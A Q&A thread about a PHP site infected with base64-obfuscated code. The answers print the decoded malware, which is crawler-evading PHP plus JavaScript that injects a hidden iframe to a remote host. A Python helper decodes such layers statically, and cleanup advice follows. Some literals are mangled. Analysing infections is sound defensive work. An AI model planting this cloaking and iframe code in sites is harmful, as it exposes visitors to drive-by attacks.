What is the secret code that was hacked into my site?

Possible duplicate:
eval base64_decode php virus

A few days ago, I noticed that none of my email scripts worked anymore. I asked the hosting provider, and they informed me that my hosting account had somehow been hacked by spammers and that I had reached the "emails per hour" limit, which was a sign that some kind of malicious code hosted on my site was sending a huge amount of mail.

I just checked my code and found this piece of secret code placed at the top of my index.php page. I absolutely do not know what it is doing, or how it can send email if it is not somehow connected to my email scripts. What is this secret code that was placed on my site?

Also, if I remove this code, will that fix my problems? Is there any way to find out if anything else has been added to my server? And I guess the only way the code could have been added to the index.php file was that my account was hacked and they added it manually, so what can I do to prevent this from happening again?

The code that was placed on my home page:

eval(base64_decode('==')); 
+4
2 answers

This script:

 <?php echo (base64_decode('==')); ?> 

Prints this output:

 error_reporting(0);
 $bot = FALSE;
 $ua = $_SERVER['HTTP_USER_AGENT'];
 $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
 foreach ($botsUA as $bs) {
     if (strpos(strtolower($ua), $bs) !== false) { $bot = true; break; }
 }
 if (!$bot) {
     echo(base64_decode('='));
 }

Decoding the second base64 string gives the following:

 <script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a) f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window.eval;w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;iw.length<0;i++){s=s+String[g](39+w[0+i]);} if(a===aa) e('e'+'('+'s'+')');</script> 

If it detects that HTTP_USER_AGENT contains any of these strings, it sets $bot = true. If nothing is found, i.e. !$bot, then it prints this JavaScript.

The resulting iframe is as follows:

 <iframe src="http://kzkmynf.zyns.com/d/404.php?go=1" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe> 

All that JavaScript is there to generate an iframe that ends up at a 404. Thus it has no effect, but creates a dead, invisible iframe. Even more mysterious, http://zyns.com/ is a registrar for free domain names, and the subdomain does not exist, but it does not give a 404 either. A whois lookup at the registrar gives this:

 Registrant:
 ChangeIP.com
 c/o Dynamic DNS Provider
 PO Box 2333
 San Marcos, CA 92079
 US

 Domain Name: ZYNS.COM

 Administrative Contact, Technical Contact:
 ChangeIP.com NSI@ChangeIP.com
 c/o Dynamic DNS Provider
 PO Box 2333
 San Marcos, CA 92079
 US
 800-791-3367 fax: 760-621-0116

ChangeIP.com seems to own ZYNS.COM, and some anonymous user created this subdomain and served this malicious code from it.

I would delete it ...

+18
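The answer above recovered the payload by running base64_decode and then working out the String.fromCharCode(39 + w[i]) loop by hand. As an added example (not code from the question or either answer), here is a static way to do the same triage without executing anything: one helper peels nested eval(base64_decode('...')) layers out of a PHP file, and another reverses the offset-39 character array from the injected script. The nested PHP sample is constructed here; HEAD is the first 48 entries of the f array quoted in the answer.

```python
import base64
import binascii
import re

# Matches eval(base64_decode('<base64>')) as found at the top of the infected index.php.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.S
)


def peel_eval_base64(php_source, max_depth=10):
    """Return each successive decoded layer of eval(base64_decode(...)) wrapping.

    Nothing is executed: each layer is only base64-decoded and searched again.
    The last element is the innermost code that would finally have run.
    """
    layers = []
    current = php_source
    for _ in range(max_depth):
        m = EVAL_B64.search(current)
        if not m:
            break
        try:
            current = base64.b64decode(re.sub(r"\s+", "", m.group(1))).decode("utf-8", "replace")
        except (ValueError, binascii.Error):
            break  # not valid base64: stop rather than guess
        layers.append(current)
    return layers


def decode_offset_array(codes, offset=39):
    """Reverse the String.fromCharCode(offset + w[i]) loop used by the injected script."""
    return "".join(chr(offset + c) for c in codes)


# Constructed sample: two nested layers, mimicking the injection in the question.
INNER = "echo 'hello';"
L2 = "eval(base64_decode('" + base64.b64encode(INNER.encode()).decode() + "'));"
SAMPLE_PHP = "<?php eval(base64_decode('" + base64.b64encode(L2.encode()).decode() + "')); ?>"

# First 48 entries of the f array from the answer; offset 39 turns them back into ASCII.
HEAD = [-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,
        27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84]

if __name__ == "__main__":
    for i, layer in enumerate(peel_eval_base64(SAMPLE_PHP), 1):
        print(f"layer {i}: {layer}")
    print(repr(decode_offset_array(HEAD)))
```

Run the same peel over every .php file in the web root to find other eval(base64_decode(...)) stubs, which is the "what else did they put in there" question raised below.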

Dang, I was just about to post when Aram got there first :-)

I would suggest that at least everything in your web directory is now suspect, if not the entire server. Removing the code is a good idea, but the real question is how they got in, and what else they put in there and where ... that is much more difficult to answer.

+3

Source: https://habr.com/ru/post/1394539/
